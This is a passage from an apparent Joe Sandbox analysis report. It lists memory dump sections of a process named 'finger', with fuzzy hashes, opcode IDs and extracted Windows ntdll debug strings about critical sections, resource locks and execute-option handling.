                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                              • API String ID: 48624451-2108815105
                                                                                              • Opcode ID: ac6cc71d80048d82c1331b6ca2c18bdf52bb82e64cc297567d06bea811312ea1
                                                                                              • Instruction ID: ca618df5bbe03bfd90ee8bc0c91e696bab97922cc3ad189d0f9efe3e2323cbb8
                                                                                              • Opcode Fuzzy Hash: ac6cc71d80048d82c1331b6ca2c18bdf52bb82e64cc297567d06bea811312ea1
                                                                                              • Instruction Fuzzy Hash: 4551F6B5A00645AFCB34DE9CC8949BFF7FDEB4C200B0488AAE495D7681D7F4DA418760
                                                                                              Strings
                                                                                              • ExecuteOptions, xrefs: 030C46A0
                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 030C46FC
                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 030C4655
                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 030C4742
                                                                                              • Execute=1, xrefs: 030C4713
                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 030C4725
                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 030C4787
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                              • API String ID: 0-484625025
                                                                                              • Opcode ID: b60dd9e91189c1786a672a6185a5a7d3a8347b9ce68de467d38f75c6ecd1300f
                                                                                              • Instruction ID: f089d2b6831c5937d97e7ac7d2bc37f8a13e5bfb62670d75b785979321ccfacb
                                                                                              • Opcode Fuzzy Hash: b60dd9e91189c1786a672a6185a5a7d3a8347b9ce68de467d38f75c6ecd1300f
                                                                                              • Instruction Fuzzy Hash: B25127356023096AEF11FFA5DC95FEE73A8AF49700F1800A9D545AB191EB709A41CF60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                              • Instruction ID: 802b2a1c53ce28eeecc5b5a65368f1dce3ae24bd2cb6761e84330ccc7ab5de78
                                                                                              • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                              • Instruction Fuzzy Hash: FE022475608351AFD709DF18C890A6FBBE5EFC8710F04892DF9898B2A4DB71E915CB42
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: __aulldvrm
                                                                                              • String ID: +$-$0$0
                                                                                              • API String ID: 1302938615-699404926
                                                                                              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                              • Instruction ID: 94ad4654b3f1142218e17634cfda67b94708d02a5d18484870de1f70be7c768d
                                                                                              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                              • Instruction Fuzzy Hash: EC818C30A062499BFF24CE68E8917EEBBE5AF45330F18469BD861A7290C6349841EB50
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: %%%u$[$]:%u
                                                                                              • API String ID: 48624451-2819853543
                                                                                              • Opcode ID: 7dec94c7a98f0b96ab968482e4497616cacb29cb021ca577775785f7e7f7889d
                                                                                              • Instruction ID: 768eb6bd2894bca641e4df7ca048a9d75864d2e07a26a4275a13c2677e25c264
                                                                                              • Opcode Fuzzy Hash: 7dec94c7a98f0b96ab968482e4497616cacb29cb021ca577775785f7e7f7889d
                                                                                              • Instruction Fuzzy Hash: 2921957AA01219ABDB10DF79DC44AFEB7FCEF48640F080566E915D7240E770DA029BA0
                                                                                              Strings
                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 030C02BD
                                                                                              • RTL: Re-Waiting, xrefs: 030C031E
                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 030C02E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                              • API String ID: 0-2474120054
                                                                                              • Opcode ID: c29a3890d59410a4cb23a60a2aa3626f1d1884b140d42be41751c9e6d53427ea
                                                                                              • Instruction ID: 17386853f3090f25bc9f21ed2935e2f3923361b6c0c4ad858b69d10604ec3598
                                                                                              • Opcode Fuzzy Hash: c29a3890d59410a4cb23a60a2aa3626f1d1884b140d42be41751c9e6d53427ea
                                                                                              • Instruction Fuzzy Hash: 19E1E130A16782DFD764CF28C884B6AB7E4BF88324F184A5DF4A58B2E0D774D844CB56
                                                                                              Strings
                                                                                              • RTL: Resource at %p, xrefs: 030C7B8E
                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 030C7B7F
                                                                                              • RTL: Re-Waiting, xrefs: 030C7BAC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                              • API String ID: 0-871070163
                                                                                              • Opcode ID: 992635105309fbd286456f82642201bef43da819779698ecd33843c5bc852122
                                                                                              • Instruction ID: 4638009a55e203282b41bfe13216e49892f31a7e7965af9e63884db0d1dbba4d
                                                                                              • Opcode Fuzzy Hash: 992635105309fbd286456f82642201bef43da819779698ecd33843c5bc852122
                                                                                              • Instruction Fuzzy Hash: EA41E2357067029FD724EF29C840B6AB7E5EF89720F140A1DF89A9B281DB71E4058F91
                                                                                              APIs
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 030C728C
                                                                                              Strings
                                                                                              • RTL: Resource at %p, xrefs: 030C72A3
                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 030C7294
                                                                                              • RTL: Re-Waiting, xrefs: 030C72C1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                              • API String ID: 885266447-605551621
                                                                                              • Opcode ID: b5628e8dae4c71a8ef0a48140df1f2f0438584878441d01af289231560a605ea
                                                                                              • Instruction ID: 63a0b27a0330bdb187215f611065d6ca147720fd19845e86b2fb4efe0cc3e88e
                                                                                              • Opcode Fuzzy Hash: b5628e8dae4c71a8ef0a48140df1f2f0438584878441d01af289231560a605ea
                                                                                              • Instruction Fuzzy Hash: A4410235702746AFD720DF25CC41B6AB7E5FF84B20F184A1DF895AB640DB21E8068BD1
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: %%%u$]:%u
                                                                                              • API String ID: 48624451-3050659472
                                                                                              • Opcode ID: 1a5bff950b249d294315fd7cc164c7716692b7412541dc0bd9719c0c03912ba8
                                                                                              • Instruction ID: ab5788c245639b3ebcfa58b2d7e0bd5e6ac93b62c9ff3c9a4232ed5fa389b652
                                                                                              • Opcode Fuzzy Hash: 1a5bff950b249d294315fd7cc164c7716692b7412541dc0bd9719c0c03912ba8
                                                                                              • Instruction Fuzzy Hash: 74318876A002199FCB20DF39DC44BEEB7F8EB48610F444596E849D7240EB709A458B60
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: __aulldvrm
                                                                                              • String ID: +$-
                                                                                              • API String ID: 1302938615-2137968064
                                                                                              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                              • Instruction ID: 6be6d1d50c51ab6bcd041f65618a42fdc8a41514d42a0e4757458628c14758ce
                                                                                              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                              • Instruction Fuzzy Hash: DF91A372E1221A9FFF64DE69C8917BEB7F5AF84B20F18451BE865A72D0D7308940A710
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $$@
                                                                                              • API String ID: 0-1194432280
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579534381.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2f70000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $$0$@$@
                                                                                              • API String ID: 0-1132210376